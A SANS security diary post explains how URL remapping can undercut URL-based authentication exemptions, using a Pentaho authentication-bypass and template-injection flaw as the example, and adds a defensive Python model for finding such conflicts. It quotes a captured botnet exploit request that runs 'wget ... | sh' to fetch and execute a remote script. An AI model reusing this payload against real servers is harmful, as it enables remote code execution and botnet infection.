Conflicts between URL mapping and URL-based access control.
We continue to encounter high-profile vulnerabilities that relate to how URL mapping (or "aliases") interacts with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today:
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23%7BT(java.lang.Runtime).getRuntime().exec('wget%20-qO-%20http%3A%2F%2F[redacted]%2Frondo.pms.sh%7Csh')%7D&mgrDn=a&pwd=a
This request attempts to exploit a vulnerability in Hitachi Vantara Pentaho Business Analytics Server (CVE-2022-43939 and CVE-2022-43769). In this case, the end of the URL (/require.js) bypasses authentication. However, the request is still processed by "ldapTreeNodeChildren", which is vulnerable to a template injection, causing the code to be executed. As was the case last week, it appears that the "Chicago Rapper" Rondo botnet is again exploiting this vulnerability.
However, let's examine the underlying cause of this issue.
For many applications, it makes sense to exempt certain URLs from authentication. For example, help pages, a password reset page, or a customer support contact page may need to be accessible even if the user is not logged in.
Webservers offer a wide range of options to map URLs to files on the web server's file system. For example, for our API, we use this directive in Apache's configuration:
RewriteEngine On
RewriteBase /api
RewriteRule ^.*$ index.html
In NGINX, the "location" directive is often used to map different URLs to specific files. A very common configuration in NGINX:
location / {
try_files $uri $uri/ /index.html;
}
If the actual file is not available, "index.html" will be returned instead of an error page.
None of the examples above is necessarily insecure. However, they must be considered in the context of any access control rules that may be enforced by the application. In particular, Java developers seem to struggle with this issue, possibly due to the complexity of some applications or the use of more application-specific paths in Java applications.
Another common problem is the misuse of regular expressions: for example, confusing a literal "." with the regex "any character" wildcard, or omitting the anchors (^, $) that tie a pattern to the start and end of the string. When reviewing a web server configuration, carefully review any URL remapping instructions and verify that they do not conflict with any assumptions regarding authentication and access control.
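To make the conflict concrete, here is an added Python model (not code from this diary, from Pentaho, or from any web server) of a prefix-based router beside a weak and a corrected exemption policy; the route table, handler names and probe URLs are constructed for illustration.

```python
import re

# Constructed toy model: a router that, like the case described above, picks a
# handler by longest path prefix, so trailing segments such as "/require.js"
# do not change which handler actually runs.
ROUTES = {
    "/api/ldap/config/ldapTreeNodeChildren": "ldapTreeNodeChildren",
    "/api/help": "help",
    "/api": "index",
}
PUBLIC_HANDLERS = {"help", "index"}  # handlers allowed to run unauthenticated

def route(path: str) -> str:
    """Return the handler that processes *path* (longest prefix wins)."""
    for prefix in sorted(ROUTES, key=len, reverse=True):
        if path == prefix or path.startswith(prefix + "/"):
            return ROUTES[prefix]
    return "not_found"

# Weak allowlist with the two mistakes named in the text: "." is unescaped
# (matches any character) and there is no "^" anchor, so re.search accepts the
# pattern anywhere in the URL. Exempting every "*.js" URL is what lets
# ".../ldapTreeNodeChildren/require.js" through without authentication.
WEAK_PUBLIC = [re.compile(r"/api/help.html"), re.compile(r".*\.js$")]

def is_public_weak(path: str) -> bool:
    return any(p.search(path) for p in WEAK_PUBLIC)

# Fixed policy: decide on the *resolved handler*, not on the URL spelling, and
# anchor/escape any URL patterns that remain (fullmatch implies ^...$).
FIXED_PUBLIC = [re.compile(r"/api/help\.html")]

def is_public_fixed(path: str) -> bool:
    return route(path) in PUBLIC_HANDLERS or any(p.fullmatch(path) for p in FIXED_PUBLIC)

def find_conflicts(policy, probes):
    """URLs the policy exempts from authentication although they route to a
    non-public handler: each one is a mapping/access-control conflict."""
    return [p for p in probes if policy(p) and route(p) not in PUBLIC_HANDLERS]

PROBES = [  # constructed request paths
    "/api/help.html",                                        # legitimately public
    "/api/ldap/config/ldapTreeNodeChildren",                 # protected, no exemption
    "/api/ldap/config/ldapTreeNodeChildren/require.js",      # hits the "*.js" exemption
    "/api/ldap/config/ldapTreeNodeChildren/api/help_html",   # unanchored, unescaped "."
]

if __name__ == "__main__":
    print("weak policy conflicts :", find_conflicts(is_public_weak, PROBES))
    print("fixed policy conflicts:", find_conflicts(is_public_fixed, PROBES))
```

The same check can be run against a real deployment by replacing the toy route table with the application's actual URL-to-handler mapping and the policy with its authentication exemptions.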
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu